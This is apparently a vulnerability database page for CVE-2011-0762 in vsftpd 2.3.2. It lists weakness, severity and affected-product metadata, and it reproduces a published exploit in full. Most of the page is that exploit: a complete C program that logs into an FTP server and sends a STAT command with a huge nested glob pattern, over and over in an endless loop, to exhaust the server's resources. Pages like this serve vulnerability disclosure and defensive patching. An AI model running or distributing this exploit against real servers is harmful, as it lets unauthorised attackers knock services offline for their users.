Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-400 |
Uncontrolled Resource Consumption The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4 |
|
AV:N/AC:L/Au:S/C:N/I:N/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 16270
Publication date : 2011-03-01 23h00 +00:00
Author : Maksymilian Arciemowicz
EDB Verified : Yes
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/*
This is code of
http://cxib.net/stuff/vspoc232.c
PoC CVE-2011-0762 ( vsftpd )
Remote Denial of Service
Affected: 2.3.2
Fix: 2.3.4
Author:
Maksymilian Arciemowicz
Use:
./vspoc232 127.0.0.1 21 user pass 1
or read
http://securityreason.com/achievement_securityalert/95
for more information
Example result:
cx@cx64:~$ telnet 172.5.0.129 21
Trying 172.5.0.129...
Connected to 172.5.0.129.
Escape character is '^]'.
500 OOPS: fork
Connection closed by foreign host.
*/
int skip=0;
int sendftp(int stream,char *what){
if(-1==send(stream,what,strlen(what),0))
printf("Can't send %s\n",what);
else
printf("send: %s\n",what);
bzero(what,sizeof(what));
}
void readftp(int stream){
char readline[4096];
if(recv(stream,readline,4096,0)<1)
if(!skip) exit(1); // end
else
printf("recv: %s\n",readline);
}
int sendstat(host,port,login,pass)
char *host,*port,*login,*pass;
{
char buffer[4097]; // send ftp command buffor
int sockfd,n,error;
struct addrinfo hints;
struct addrinfo *res, *res0;
memset(&hints, 0, sizeof(hints));
hints.ai_family = PF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
error = getaddrinfo(host,port,&hints,&res0);
if (error){
errorcon:
printf("Can`t connect\n.exit");
exit(1);
}
if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0) goto errorcon;
if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;
readftp(sockfd);
snprintf(buffer,4096,"USER %s\nPASS %s\n\n",login,pass);
sendftp(sockfd,buffer);
readftp(sockfd);
snprintf(buffer,4096,"STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}\n");
sendftp(sockfd,buffer);
freeaddrinfo(res0);
}
int main(int argc,char *argv[])
{
char *login,*pass,logindef[]="anonymous",passdef[]="cxib.net@127.0.0.1";
if(argc<3){
printf("\nUse: ./vspoc232 host port [username] [password] [option]\nhost and port are requied\nuse option = 1 to skip recv() fails\n\nexample:\n./vspoc232 127.0.0.1 21 user pass 1\n\n");
exit(1);
}
char *host=argv[1];
char *port=argv[2];
if(4<=argc) login=argv[3];
else login=logindef;
if(5<=argc) pass=argv[4];
else pass=passdef;
if(6<=argc) skip=1;
while(1){
printf("----------------------------- next\n");
sendstat(host,port,login,pass);
sleep(1); // some delay to be sure
}
return 0; // never happen
}
Products Mentioned
Configuraton 0
Vsftpd_project>>Vsftpd >> Version To (excluding) 2.3.3
Configuraton 0
Canonical>>Ubuntu_linux >> Version 6.06
Canonical>>Ubuntu_linux >> Version 8.04
Canonical>>Ubuntu_linux >> Version 9.10
Canonical>>Ubuntu_linux >> Version 10.04
Canonical>>Ubuntu_linux >> Version 10.10
Configuraton 0
Fedoraproject>>Fedora >> Version 13
Fedoraproject>>Fedora >> Version 14
Fedoraproject>>Fedora >> Version 15
Configuraton 0
Debian>>Debian_linux >> Version 5.0
Debian>>Debian_linux >> Version 6.0
Debian>>Debian_linux >> Version 7.0
Configuraton 0
Opensuse>>Opensuse >> Version 11.2
Opensuse>>Opensuse >> Version 11.3
Opensuse>>Opensuse >> Version 11.4
Suse>>Linux_enterprise_server >> Version 9
Suse>>Linux_enterprise_server >> Version 10
Suse>>Linux_enterprise_server >> Version 10
Suse>>Linux_enterprise_server >> Version 11
References